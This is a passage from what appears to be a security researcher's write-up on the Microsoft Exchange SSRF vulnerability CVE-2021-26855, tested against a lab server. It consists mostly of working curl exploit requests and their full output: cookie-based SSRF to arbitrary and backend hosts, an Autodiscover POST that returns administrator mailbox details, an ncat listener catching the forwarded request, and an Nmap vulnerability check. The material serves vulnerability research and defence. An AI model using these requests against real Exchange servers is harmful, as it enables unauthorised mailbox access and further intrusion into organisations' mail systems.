443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id=\"content\" role=\"main\"><h1 class=\"heading1\">Service</h1><BR/><P class=\"intro\">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl\">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class=\"intro\">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color=\"blue\">class </font><font color=\"black\">Test\n </font>{\n <font color=\"blue\"> static void </font>Main()\n {\n <font color=\"black\">HelloClient</font> client = <font color=\"blue\">new </font><font color=\"black\">HelloClient</font>();\n \n <font color=\"darkgreen\"> // Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> // Always close the client.\n </font> client.Close();\n }\n }\n </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color=\"blue\">Class </font><font color=\"black\">Test\n </font><font color=\"blue\"> Shared Sub </font>Main()\n <font color=\"blue\"> Dim </font>client As <font color=\"black\">HelloClient</font> = <font color=\"blue\">New </font><font color=\"black\">HelloClient</font>()\n <font color=\"darkgreen\"> ' Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> ' Always close the client.\n </font> client.Close()\n <font color=\"blue\"> End Sub\n * Connection #0 to host 192.168.123.183 left intact\n </font><font color=\"blue\">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0\n wvu@kharak:~$\n \n\n`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target\u2019s mailbox. A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.\n \n \n wvu@kharak:~/Downloads$ cat poc.xml\n <?xml version=\"1.0\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>Administrator@gibson.local</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n wvu@kharak:~/Downloads$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM\" -H \"Content-Type: text/xml\" \"https://192.168.123.207/ecp/$RANDOM.js\" -d @poc.xml\n * Trying 192.168.123.207...\n * TCP_NODELAY set\n * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fa592808200)\n > POST /ecp/3425.js HTTP/2\n > Host: 192.168.123.207\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753\n > Content-Type: text/xml\n > Content-Length: 354\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n * We are completely uploaded and fine\n < HTTP/2 200\n < cache-control: private\n < content-type: text/xml; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Wed, 10 Mar 2021 01:26:19 GMT\n < content-length: 3866\n <\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006\">\n <Response xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n <User>\n <DisplayName>Administrator</DisplayName>\n <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>\n <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>\n <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>\n </User>\n <Account>\n <AccountType>email</AccountType>\n <Action>settings</Action>\n <MicrosoftOnline>False</MicrosoftOnline>\n <Protocol>\n <Type>EXCH</Type>\n <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>\n <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>\n <ServerVersion>73C18880</ServerVersion>\n <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>\n <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>\n <AD>WIN-T4RO9496TA7.gibson.local</AD>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>\n <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>\n <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>\n <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>\n <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>\n <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>\n <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>\n <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>\n <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>\n <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>\n <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>\n <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>\n <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>\n <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>\n <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>\n <ServerExclusiveConnect>off</ServerExclusiveConnect>\n </Protocol>\n <Protocol>\n <Type>EXPR</Type>\n <Server>win-t4ro9496ta7.gibson.local</Server>\n <SSL>Off</SSL>\n <AuthPackage>Ntlm</AuthPackage>\n <ServerExclusiveConnect>on</ServerExclusiveConnect>\n <CertPrincipalName>None</CertPrincipalName>\n <GroupingInformation>Default-First-Site-Name</GroupingInformation>\n </Protocol>\n <Protocol>\n <Type>WEB</Type>\n <Internal>\n <OWAUrl AuthenticationMethod=\"Basic, Fba\">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>\n <Protocol>\n <Type>EXCH</Type>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n </Protocol>\n </Internal>\n </Protocol>\n </Account>\n </Response>\n * Connection #0 to host 192.168.123.207 left intact\n </Autodiscover>* Closing connection 0\n wvu@kharak:~/Downloads$\n \n\n**cdelafuente-r7** at March 24, 2021 2:49pm UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; 